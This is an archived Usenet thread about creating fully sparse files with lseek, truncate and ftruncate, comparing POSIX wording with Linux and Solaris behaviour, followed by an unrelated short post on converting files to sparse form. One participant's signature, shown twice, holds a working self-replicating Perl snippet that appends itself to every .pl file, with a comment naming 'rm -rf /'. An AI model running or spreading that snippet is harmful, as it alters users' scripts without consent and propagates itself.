how to make a 100% sparse file?

Post by phil-news-nos.. » Sun, 14 Jul 2002 02:27:34



How can I make a 100% sparse file of a given size?  What I tried was to
open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
and now the file is the full size specified, but clearly the last page
is not sparse.  How can I get it to be 100% sparse?

Oh, I can live with the last page not being sparse, but I had originally
thought the first method was the right way, so I am curious.  If it was
the right way, Linux is broken.

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 


Post by Donald McLachl » Sun, 14 Jul 2002 03:09:35



> How can I make a 100% sparse file of a given size?  What I tried was to
> open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
> bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
> and now the file is the full size specified, but clearly the last page
> is not sparse.  How can I get it to be 100% sparse?

> Oh, I can live with the last page not being sparse, but I had originally
> thought the first method was the right way, so I am curious.  If it was
> the right way, Linux is broken.

> --
> -----------------------------------------------------------------
> | Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

> -----------------------------------------------------------------

Does truncate() do what you want?  (man truncate)

--

Communications Research Centre / RNS    Tel     (613) 998-2845
3701 Carling Ave.,                      Fax     (613) 998-9648
Ottawa, Ontario
K2H 8S2
Canada

 
 
 


Post by Joe Halpi » Sun, 14 Jul 2002 03:11:36



> How can I make a 100% sparse file of a given size?  What I tried was
> to open the new file, then lseek(fd,size,SEEK_CUR).  The file is
> still 0 bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then
> write(fd,"",1); and now the file is the full size specified, but
> clearly the last page is not sparse.  How can I get it to be 100%
> sparse?

> Oh, I can live with the last page not being sparse, but I had
> originally thought the first method was the right way, so I am
> curious.  If it was the right way, Linux is broken.

POSIX/SUS says

  "The lseek() function shall allow the file offset to be set beyond
   the end of the existing data in the file. If data is later written
   at this point, subsequent reads of data in the gap shall return
   bytes with the value 0 until data is actually written into the gap.

   The lseek() function shall not, by itself, extend the size of a
   file."

So I don't think linux is broken (at least not in that respect).

The whole point of sparse files is that disk blocks are not allocated
unless data has actually been written to them, so I'm not sure why you
would expect disk blocks to be allocated otherwise. If so, how could
you even *have* sparse files?
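
The lseek() wording quoted above can be checked with a small experiment. The following is a minimal sketch, not anything posted in the thread: `size_after_seek` is a hypothetical helper name and the file path is whatever scratch path the caller passes in. It creates a file, seeks to an offset, optionally writes a single zero byte there, and returns the st_size the system reports afterwards.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: create `path`, seek to `offset`, optionally write
   one zero byte at that offset, and return the resulting st_size
   (or -1 on any error). */
off_t size_after_seek(const char *path, off_t offset, int write_byte)
{
    struct stat st;
    off_t result = -1;
    int fd = open(path, O_CREAT | O_RDWR | O_TRUNC, 0644);

    if (fd == -1)
        return -1;
    if (lseek(fd, offset, SEEK_SET) != (off_t)-1
        && (!write_byte || write(fd, "", 1) == 1)
        && fstat(fd, &st) == 0)
        result = st.st_size;
    close(fd);
    return result;
}
```

With write_byte set to 0 the seek alone should leave the size at 0, as the quoted text requires; with write_byte set to 1 the size should become offset + 1, because one byte now exists at that offset.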

Joe

 
 
 


Post by E. Gibbo » Sun, 14 Jul 2002 03:12:19



>How can I make a 100% sparse file of a given size?  What I tried was to
>open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
>bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
>and now the file is the full size specified, but clearly the last page
>is not sparse.  How can I get it to be 100% sparse?

>Oh, I can live with the last page not being sparse, but I had originally
>thought the first method was the right way, so I am curious.  If it was
>the right way, Linux is broken.

I don't have time to mess with test code right now, but: what about
ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
then remove the non-sparse portion?

--Ben

--

 
 
 


Post by Rudolf Polze » Sun, 14 Jul 2002 03:44:49




> >How can I make a 100% sparse file of a given size?  What I tried was to
> >open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
> >bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
> >and now the file is the full size specified, but clearly the last page
> >is not sparse.  How can I get it to be 100% sparse?

> I don't have time to mess with test code right now, but: what about
> ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
> then remove the non-sparse portion?

Even simpler:

| $ perl -e 'open FH, ">sparse"; truncate FH, 128*2**20; close FH'
| $ ls -lisa sparse
|   49436    0 -rw-r--r--    1 rpolzer  users    134217728 Jul 12 20:42 sparse
             ^                                   ^^^^^^^^^
Is this also true according to SUSv2 and/or POSIX?

--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################

 
 
 


Post by Donald McLachl » Sun, 14 Jul 2002 04:48:18


I have a program called dd.  :-)
I have a program which uses truncate() called truncate.
I have a program which uses lseek(fd,size-1,SEEK_CUR) + write(fd,"",1) called sparse.
I have this program called dd.  :-)
I have a program which uses stat() called stat.
I have a program called ls.  :-)

        janus don> dd bs=1024k if=/dev/zero of=/tmp/junk count=20
        20+0 records in
        20+0 records out
        janus don> ls -ls /tmp/junk
        20504 -rwxr-xr-x   1 don      20971520 Jul 12 15:40 /tmp/junk

So a non-sparse 20 Meg file has 20504 blocks in it.

        janus don> truncate /tmp/junk 0
        janus don> ls -ls /tmp/junk
           0 -rwxr-xr-x   1 don             0 Jul 12 15:43 /tmp/junk
        janus don> truncate /tmp/junk 20971520
        janus don> ls -ls /tmp/junk
          24 -rwxr-xr-x   1 don      20971520 Jul 12 15:43 /tmp/junk

Truncate will "create" a 20 Meg file, but only uses 24 blocks, so it is a
sparse file.

        janus don> rm /tmp/junk
        janus don> sparse /tmp/junk 20971520
        janus don> ls -ls /tmp/junk
          24 -rwxr-xr-x   1 don      20971520 Jul 12 15:45 /tmp/junk

sparse also creates a sparse 20 Meg file.

But why does a 1 byte file use 2 blocks on Solaris?

        janus don> rm /tmp/junk
        janus don> sparse /tmp/junk 1
        janus don> stat /tmp/junk
        /tmp/junk
                st_dev = 30932996
                st_ino = 26
                st_mode = 0o33261
                st_nlink = 1
                st_uid = 100
                st_gid = 100
                st_rdev = 0
                st_size = 1
                st_atime = Fri Jul 12 15:47:27 2002
                st_mtime = Fri Jul 12 15:47:27 2002
                st_ctime = Fri Jul 12 15:47:27 2002
                st_blksize = 8192
                st_blocks = 2

--

Communications Research Centre / RNS    Tel     (613) 998-2845
3701 Carling Ave.,                      Fax     (613) 998-9648
Ottawa, Ontario
K2H 8S2
Canada

 
 
 


Post by phil-news-nos.. » Sun, 14 Jul 2002 05:04:31




|> How can I make a 100% sparse file of a given size?  What I tried was to
|> open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
|> bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
|> and now the file is the full size specified, but clearly the last page
|> is not sparse.  How can I get it to be 100% sparse?
|>
|> Oh, I can live with the last page not being sparse, but I had originally
|> thought the first method was the right way, so I am curious.  If it was
|> the right way, Linux is broken.
|>
|> --
|> -----------------------------------------------------------------
|> | Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

|> -----------------------------------------------------------------
|
| Does truncate() do what you want?  (man truncate)

My man page has:

If the file previously was larger than this size, the extra data is lost.
If the file  previously was shorter, it is unspecified whether the file
is left unchanged or is extended. In the latter

So this was not something that seemed to me like it would do it any
better than lseek().

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 


Post by phil-news-nos.. » Sun, 14 Jul 2002 05:10:03



| The whole point of sparse files is that disk blocks are not allocated
| unless data has actually been written to them, so I'm not sure why you
| would expect disk blocks to be allocated otherwise. If so, how could
| you even *have* sparse files?

I don't want them allocated.  I can have a 1 block sparse file with
a length of many megabytes.  What I want is to have the length there.

This may be caused by another problem.  When the length of the file
is 0, I was able to mmap() many megabytes of the file into the virtual
address space, and accessing the data in that address space worked
fine, but if I accessed it by a call to read(), I got EFAULT from it.
If I simply add a piece of code to store a 0 byte into that address
space (no faults happen as a result of this) before calling read(),
then the read() works fine.  While exploring that, I found that the
length is 0 instead of the expected size, and I am curious whether the
problem is that read() checks the length somewhere along the way, or
that the page is sparse (if I didn't store the 0).
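
For the mmap() case described above, one commonly used approach is to give the file its full length before mapping it, since POSIX says that references to whole pages of a mapping that lie beyond the end of the underlying object result in SIGBUS. The following is only a sketch under assumptions: it relies on an ftruncate() that extends the file, `map_new_file` is a hypothetical helper name, and whether a zero-length file is actually what caused the EFAULT from read() is not established here.

```c
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: create `path` with the given length and map it
   read/write.  Returns the mapping, or NULL on failure. */
void *map_new_file(const char *path, size_t length)
{
    void *p;
    int fd = open(path, O_CREAT | O_RDWR | O_TRUNC, 0644);

    if (fd == -1)
        return NULL;
    /* Set the file length first, so that every mapped page lies
       within the file rather than beyond its end. */
    if (ftruncate(fd, (off_t)length) == -1) {
        close(fd);
        return NULL;
    }
    p = mmap(NULL, length, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    close(fd);  /* the mapping remains valid after the descriptor is closed */
    return p == MAP_FAILED ? NULL : p;
}
```

The caller is expected to munmap() the region when done. On a filesystem that supports sparse files, only the pages that are actually stored to should end up with blocks allocated.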

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 


Post by phil-news-nos.. » Sun, 14 Jul 2002 05:11:08



| I don't have time to mess with test code right now, but: what about
| ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
| then remove the non-sparse portion?

I don't want to create the file larger first.

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 


Post by phil-news-nos.. » Sun, 14 Jul 2002 05:14:39





|> >How can I make a 100% sparse file of a given size?  What I tried was to
|> >open the new file, then lseek(fd,size,SEEK_CUR).  The file is still 0
|> >bytes in size.  So I tried lseek(fd,size-1,SEEK_CUR) then write(fd,"",1);
|> >and now the file is the full size specified, but clearly the last page
|> >is not sparse.  How can I get it to be 100% sparse?
|>
|> I don't have time to mess with test code right now, but: what about
|> ftruncate()?  I.e., create a not-quite-fully-sparse file as you describe,
|> then remove the non-sparse portion?
|
| Even simpler:
|
| | $ perl -e 'open FH, ">sparse"; truncate FH, 128*2**20; close FH'
| | $ ls -lisa sparse
| |   49436    0 -rw-r--r--    1 rpolzer  users    134217728 Jul 12 20:42 sparse
|              ^                                   ^^^^^^^^^
| Is this also true according to SUSv2 and/or POSIX?

My man page has:

Truncate causes the file named by path or referenced by fd to be
truncated to at most length bytes in size.  If the file previously was
larger than this size, the extra data is lost.  If the file  previously
was shorter, it is unspecified whether the file is left unchanged or is
extended. In the latter case the extended part reads as zero bytes.
With ftruncate, the file must be open for writing.

The file starts at length 0, then would be extended.  Since this says it
is unspecified if that would happen, I couldn't depend on it.  Maybe it
will work better.  But I want to fully explore this first.  Somewhere I
had gotten the idea that lseek() would do the right thing for sure, but
it doesn't.

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 


Post by phil-news-nos.. » Sun, 14 Jul 2002 05:27:22



| I have a program called dd.  :-)
| I have a program which uses truncate() called truncate.
| I have a program which uses lseek(fd,size-1,SEEK_CUR) + write(fd,"",1) called sparse.
| I have this program called dd.  :-)
| I have a program which uses stat() called stat.
| I have a program called ls.  :-)
|
|       janus don> dd bs=1024k if=/dev/zero of=/tmp/junk count=20
|       20+0 records in
|       20+0 records out
|       janus don> ls -ls /tmp/junk
|       20504 -rwxr-xr-x   1 don      20971520 Jul 12 15:40 /tmp/junk
|
| So a non sparse 20 Meg file has 20504 block in it.

That's 24 blocks MORE than the number of blocks of data (20480).
Pointer blocks?

|       janus don> truncate /tmp/junk 0
|       janus don> ls -ls /tmp/junk
|          0 -rwxr-xr-x   1 don             0 Jul 12 15:43 /tmp/junk
|       janus don> truncate /tmp/junk 20971520
|       janus don> ls -ls /tmp/junk
|         24 -rwxr-xr-x   1 don      20971520 Jul 12 15:43 /tmp/junk
|
| Truncate will "create" a 20 Meg file, but only uses 24 blocks, so it is a
| sparse file.

At least significantly sparse, but maybe not 100% sparse.  Can't be sure:
there are those 24 blocks.  They could be accounted for as pointer blocks,
so maybe the data blocks really are sparse.  I wonder if it is possible
to create a genuinely sparse file without the pointer blocks being
allocated yet.

|       janus don> rm /tmp/junk
|       janus don> sparse /tmp/junk 20971520
|       janus don> ls -ls /tmp/junk
|         24 -rwxr-xr-x   1 don      20971520 Jul 12 15:45 /tmp/junk
|
| sparse also creates a sparse 20 Meg file.

This is what I do now.

| But why does a 1 byte file use 2 blocks on Solaris?
|
|       janus don> rm /tmp/junk
|       janus don> sparse /tmp/junk 1
|       janus don> stat /tmp/junk
|       /tmp/junk
|               st_dev = 30932996
|               st_ino = 26
|               st_mode = 0o33261
|               st_nlink = 1
|               st_uid = 100
|               st_gid = 100
|               st_rdev = 0
|               st_size = 1
|               st_atime = Fri Jul 12 15:47:27 2002
|               st_mtime = Fri Jul 12 15:47:27 2002
|               st_ctime = Fri Jul 12 15:47:27 2002
|               st_blksize = 8192
|               st_blocks = 2

One block for the data, and one block in a one layer pointer hierarchy.
The locations of the data blocks, indexable by the relative offset,
have to reside somewhere.

The case of 20480 blocks of data would probably need at least 20 blocks
for pointers (assuming a block is 4096 bytes, a pointer is 4 bytes, and
a block has 1024 pointers).  Now where are those 20 pointer blocks
pointed to from?  Just one more block could accommodate a parent with 20
pointers, so 3 blocks are still unaccounted for with that logic.  I
suspect the logic is more complex, where the first part of the file has
a 1 level pointer layering, and the rest has a 2 level pointer layering.
I'm just guessing.  Surely some Solaris docs on UFS explain how it
works inside (I've never looked and I've used Solaris a lot).
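
The guess above can be written out as arithmetic. This is only a sketch of the reasoning in this post, using its stated assumptions (1024 pointers per block, one layer of pointer blocks plus a single parent block when there is more than one pointer block); it is not a description of how UFS or any real filesystem lays out its metadata, and `pointer_blocks` is a hypothetical name.

```c
/* Hypothetical helper: pointer blocks needed to index `data_blocks`
   under the simple model guessed at in the post: one layer of pointer
   blocks, plus parent blocks only if there is more than one of them. */
long pointer_blocks(long data_blocks, long ptrs_per_block)
{
    /* round up: each pointer block indexes ptrs_per_block data blocks */
    long leaves = (data_blocks + ptrs_per_block - 1) / ptrs_per_block;
    long parents = leaves > 1
        ? (leaves + ptrs_per_block - 1) / ptrs_per_block
        : 0;

    return leaves + parents;
}
```

Under this model 20480 data blocks need 20 + 1 = 21 pointer blocks, which leaves 3 of the 24 observed blocks unexplained, and a 1-block file needs 1 pointer block, which matches st_blocks = 2 only if the two counts use the same unit.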

--
-----------------------------------------------------------------
| Phil Howard - KA9WGN |   Dallas   | http://linuxhomepage.com/ |

-----------------------------------------------------------------

 
 
 


Post by Joe Halpi » Sun, 14 Jul 2002 06:11:28




> | The whole point of sparse files is that disk blocks are not
> | allocated unless data has actually been written to them, so I'm
> | not sure why you would expect disk blocks to be allocated
> | otherwise. If so, how could you even *have* sparse files?

> I don't want them allocated.  I can have a 1 block sparse file with
> a length of many megabytes.  What I want is to have the length
> there.

What length? My point is that a sparse file, by definition, doesn't
have any length until something is written to it. The spec for lseek()
confirms that, unless I'm misunderstanding it.

It appears that truncate() has different semantics according to
POSIX/SUS, but I'm not seeing a difference with linux (which I believe
was the platform you asked about (?))

What does it mean to you to create a sparse file? What it means to me
is that no disk space is used (and therefore there is no file length)
until something is actually written to the file. If lseek() moves the
file pointer to a megabyte, then another lseek() moves the file pointer
to 1, which should be used for the file size, since nothing was written
to the file?

I might be misunderstanding your actual problem. Sorry if so.

Joe

 
 
 


Post by Barry Margoli » Sun, 14 Jul 2002 06:41:01





>> I don't want them allocated.  I can have a 1 block sparse file with
>> a length of many megabytes.  What I want is to have the length
>> there.

>What length? My point is that a sparse file, by definition, doesn't
>have any length until something is written to it.

I think he means the length shown by "ls -l", and reported by stat(2) in
the stat.st_size member.
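
The two numbers being discussed in this thread, the length that "ls -l" shows and the space actually allocated, both come from stat(2). The following is a minimal sketch for comparing them; `file_sizes` and `print_sizes` are hypothetical names, and the multiplication by 512 is an assumption (st_blocks is counted in 512-byte units on Linux and many other systems, but POSIX leaves the unit to the implementation).

```c
#include <stdio.h>
#include <sys/stat.h>

/* Hypothetical helper: report the apparent size (st_size) and the
   allocated size of `path`.  Returns 0 on success, -1 on error. */
int file_sizes(const char *path, long long *apparent, long long *allocated)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    *apparent = (long long)st.st_size;
    /* Assumption: st_blocks is in 512-byte units. */
    *allocated = (long long)st.st_blocks * 512;
    return 0;
}

/* Print both values; a sparse file shows allocated < apparent. */
void print_sizes(const char *path)
{
    long long apparent, allocated;

    if (file_sizes(path, &apparent, &allocated) == 0)
        printf("%s: apparent %lld bytes, allocated %lld bytes\n",
               path, apparent, allocated);
}
```

A file can have a large st_size while st_blocks stays small, which is the situation the original question is asking for.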

--

Genuity, Woburn, MA
*** DON'T SEND TECHNICAL QUESTIONS DIRECTLY TO ME, post them to newsgroups.
Please DON'T copy followups to me -- I'll assume it wasn't posted to the group.

 
 
 


Post by Rudolf Polze » Sun, 14 Jul 2002 06:40:12



> My man page has:

> Truncate causes the file named by path or referenced by fd to be
> truncated to at most length bytes in size.  If the file previously was
> larger than this size, the extra data is lost.  If the file  previously
> was shorter, it is unspecified whether the file is left unchanged or is
> extended. In the latter case the extended part reads as zero bytes.
> With ftruncate, the file must be open for writing.

> The file starts at length 0, then would be extended.  Since this says it
> is unspecified if that would happen, I couldn't depend on it.  Maybe it
> will work better.  But I want to fully explore this first.  Somewhere I
> had gotten the idea that lseek() would do the right thing for sure, but
> it doesn't.

Mine:

| TRUNCATE(2)         Linux Programmer's Manual         TRUNCATE(2)
|
| NAME
|        truncate,  ftruncate  -  truncate  a  file  to a specified
|        length
|
| SYNOPSIS
|        #include <unistd.h>
|
|        int truncate(const char *path, off_t length);
|        int ftruncate(int fd, off_t length);
|
| DESCRIPTION
|        The truncate and ftruncate  functions  cause  the  regular
|        file  named by path or referenced by fd to be truncated to
|        a size of precisely length bytes.
|
|        If the file previously was  larger  than  this  size,  the
|        extra  data  is lost.  If the file previously was shorter,
|        it is extended, and the extended part reads as zero bytes.
[...]
| CONFORMING TO
|        4.4BSD,  SVr4  (these function calls first appeared in BSD
|        4.2).  POSIX 1003.1-1996 has ftruncate.  POSIX 1003.1-2001
|        also has truncate, as an XSI extension.
|
|        SVr4   documents   additional  truncate  error  conditions
|        EMFILE, EMULTIHP, ENFILE,  ENOLINK.   SVr4  documents  for
|        ftruncate an additional EAGAIN error condition.
|
| NOTES
|        The  above  description is for XSI-compliant systems.  For
|        non-XSI-compliant systems, the POSIX standard  allows  two
|        behaviours  for  ftruncate  when  length  exceeds the file
|        length (note that truncate is not specified at all in such
|        an  environment):  either returning an error, or extending
|        the file.  (Most Unices follow the XSI requirement.)
|
| SEE ALSO
|        open(2)
|
|                             1998-12-21                TRUNCATE(2)

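So the best you can do is something like this:

if (ftruncate (fd, length))
{
  /* ftruncate() could not extend the file: fall back to seeking to the
     last byte and writing a single zero there */
  if (lseek (fd, length - 1, SEEK_SET) == -1)
    return -1;
  if (write (fd, "", 1) != 1)
    return -1;
}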

This will make the file "as sparse as possible": completely if XSI is
followed and incompletely if XSI is not followed, but POSIX is.
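
The fragment above can be wrapped into a complete function. This is a minimal sketch of the same idea, not a definitive implementation: `make_sparse` is a hypothetical name, and it simply treats any ftruncate() failure as "could not extend" and falls back to the seek-and-write method.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: create `path` with a size of `length` bytes,
   allocating as little disk space as the system allows.
   Returns 0 on success, -1 on error. */
int make_sparse(const char *path, off_t length)
{
    int rc = 0;
    int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);

    if (fd == -1)
        return -1;
    if (length > 0 && ftruncate(fd, length) != 0) {
        /* Fallback for systems where ftruncate() will not extend:
           write one zero byte at the last offset instead. */
        if (lseek(fd, length - 1, SEEK_SET) == (off_t)-1
            || write(fd, "", 1) != 1)
            rc = -1;
    }
    if (close(fd) != 0)
        rc = -1;
    return rc;
}
```

Something like make_sparse("/tmp/junk", 20971520) followed by "ls -ls /tmp/junk" would show whether the result is fully sparse on a given system; the path here is just the one used in the earlier posts.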

--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################

 
 
 


Post by Joe Halpi » Sun, 14 Jul 2002 07:34:07






> >> I don't want them allocated.  I can have a 1 block sparse file with
> >> a length of many megabytes.  What I want is to have the length
> >> there.

> >What length? My point is that a sparse file, by definition, doesn't
> >have any length until something is written to it.

> I think he means the length shown by "ls -l", and reported by
> stat(2) in the stat.st_size member.

That's what I thought he meant as well, but what should that value be?
Given the following program

#include <fcntl.h>
#include <unistd.h>
int main(void)
{
  int fd = open("/tmp/junk", O_CREAT | O_WRONLY | O_TRUNC, 0644);
  lseek(fd, 1024, SEEK_SET);  /* move past the end; nothing is written */
  lseek(fd, 1, SEEK_SET);     /* move back; still nothing is written */
  close(fd);
  return 0;
}

What should ls report as the file size?

Joe

 
 
 

1. Make sparse-able files sparse

Hi to all

I would like to save 20% space in our filesystem by making all files
that are by nature sparse (but do hold the full disk space; I'd call
them "sparse-able" but not sparse yet) truly sparse, in the sense that
they will take much less space (for example, du filename and ls -l
filename would show different numbers after you correct for du
printing in KB and ls -l in bytes). Is there a tool that would find
which files are "sparse-able" and then make them sparse, for example
by using cp --sparse etc?
I looked in Google web and groups for a program that can find out if a
file is sparse-able but not saved as sparse yet and save it as sparse,
but no luck. Am I missing something? I would think this tool could be
very useful for system administrators etc for saving space (we are
doing image processing and I believe that around 20% sizewise of files
are sparse in our case).

I am familiar with cp --sparse and rsync --sparse by the way, but I am
looking for a better way than recopying the whole directory.

Stelios
